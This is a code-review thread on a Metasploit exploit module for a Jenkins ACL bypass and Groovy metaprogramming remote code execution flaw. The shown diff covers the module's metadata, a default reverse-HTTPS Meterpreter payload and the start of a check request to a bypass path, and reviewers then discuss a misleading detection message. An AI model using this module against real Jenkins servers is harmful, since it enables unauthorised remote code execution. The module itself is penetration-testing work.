modules/exploits/multi/http/jenkins_metaprogramming.rb

```diff
@@ -0,0 +1,263 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Jenkins ACL Bypass and Metaprogramming RCE',
+      'Description'    => %q{
+        This module exploits a vulnerability in Jenkins dynamic routing to
+        bypass the Overall/Read ACL and leverage Groovy metaprogramming to
+        download and execute a malicious JAR file.
+      },
+      'Author'         => [
+        'Orange Tsai', # Discovery and PoC
+        'wvu'          # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2019-1003000'], # Script Security
+        ['CVE', '2019-1003001'], # Pipeline: Groovy
+        ['CVE', '2019-1003002'], # Pipeline: Declarative
+        ['EDB', '46427'],
+        ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],
+        ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],
+        ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html']
+      ],
+      'DisclosureDate' => '2019-01-08', # Public disclosure
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)', {}]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'},
+      'Notes'          => {
+        'Stability'    => [CRASH_SAFE],
+        'SideEffects'  => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+        'Reliability'  => [REPEATABLE_SESSION]
+      },
+      'Stance'         => Stance::Aggressive # Be aggressive, b-e aggressive!
+    ))
+
+    register_options([
+      Opt::RPORT(8080),
+      OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])
+    ])
+
+    deregister_options('URIPATH')
+  end
+
+=begin
+  http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]
+=end
+  def check
+    checkcode = CheckCode::Safe
+
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => go_go_gadget1('/search/index'),
+      'vars_get' => {'q' => 'a'}
+    )
+
+    unless res && (version = res.headers['X-Jenkins'])
+      vprint_error('Jenkins not detected')
```

Comment:
The `check` method returns `[-] Jenkins not detected` which is kind of misleading.

If the gadget fails, the server returns 404, and the appropriate headers aren't returned.

```
msf5 exploit(multi/http/jenkins_metaprogramming) > rcheck 
[*] Reloading module...
Date: Sun, 10 Jun 2018 11:26:21 GMT
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 321
Server: Jetty(9.2.z-SNAPSHOT)


[-] Jenkins not detected
[*] 172.16.191.190:8080 - Cannot reliably check exploitability.
```

Reply:
The server will return 404 in both cases (which is why I didn't check for it), but only the vulnerable case will result in the ACL bypass succeeding and displaying the user list.

Apologies if I'm misunderstanding your comment.

Reply:
Ah, I see. It is Jenkins, but there's no `X-Jenkins` header. I can fix that.

Reply:
We can add additional Jenkins identification, but I'm not up for it in this PR, and I'd want to consolidate functionality into library code.

Thanks for the catch.